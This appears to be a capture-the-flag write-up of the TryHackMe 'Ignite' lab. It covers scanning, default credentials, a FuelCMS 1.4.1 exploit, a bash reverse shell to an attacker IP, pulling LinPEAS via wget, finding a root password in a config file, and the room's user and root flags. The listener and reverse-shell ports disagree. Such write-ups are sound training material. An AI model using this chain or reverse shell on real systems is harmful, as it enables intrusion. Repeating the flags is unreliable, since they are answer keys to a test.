Post

Tryhackme: Ignite

Tryhackme: Ignite

Tryhackme: Ignite — 19 June 2025

TryHackMe Logo Ignite


🕵️ Web App Testing & Privilege Escalation — Task 1


🔍 Nmap Scan

Command:

1
sudo nmap -T4 -n -sC -sV -Pn -p- -oN networkScan.txt 10.10.242.113

Nmap Scan Screenshot


📂 Directory Scan (Gobuster)

Command:

1
gobuster dir -u http://10.10.87.128/ -w /usr/share/wordlists/seclists/Discovery/Web-Content/raft-small-directories.txt -o directory_scan.txt

Directory Scan Screenshot


🕸️ Web Scraping

Web Scraping Screenshot

Credentials Found:

  • Username: admin
  • Password: admin

🗂️ Exploiting FuelCMS v1.4.1

FuelCMS Exploit Screenshot

Exploit Command:

1
python3 console.py -t <IP_Address>

Exploit Output


🐚 Reverse Shell

Command:

1
python -c 'import subprocess;subprocess.call(["bash","-c","bash -i >& /dev/tcp/10.8.76.195/4445 0>&1"])'

Reverse Shell Screenshot

Listener:

1
nc -lvnp 4444

Netcat Listener Screenshot


🔼 Privilege Escalation

Find SUID Binaries:

1
find / -perm -4000 -type f 2>/dev/null

SUID Scan Screenshot


🛠️ Tools: LinPEAS

Download LinPEAS:

1
wget http://<Attacker_IP>:<Port>/linpeas.sh

Download LinPEAS

Run LinPEAS:

1
sh linpeas.sh

LinPEAS Output

Flag Path Found: LinPEAS Flag Path


🏁 User Flag

  • Flag: 6470e394cbf6dab6a91682cc8585059b User Flag

🔑 Root Password Discovery

  • Password: mememe
  • Found in: /var/www/html/fuel/application/config/database.php

Root Password Found

Backup Manager Files: Backup Manager Files


🏆 Accessing Root

  1. Try to switch user:
    1
    
     su -
    

    If you get su: must be run from a terminal, spawn a TTY:

    1
    
     python -c 'import pty; pty.spawn("/bin/bash")'
    
    • Press CTRL+Z to background the shell.
    • Run:
      1
      2
      
      stty raw -echo
      fg
      
    • Press ENTER to return to the shell.

Access Root Run Netcat Gain Root


🏁 Root Flag

  • Flag: b9bbcb33e11b80be759c4e844862482d

    Root Flag


🎉 Happy Hacking!

Happy Hacking
This post is licensed under CC BY 4.0 by the author.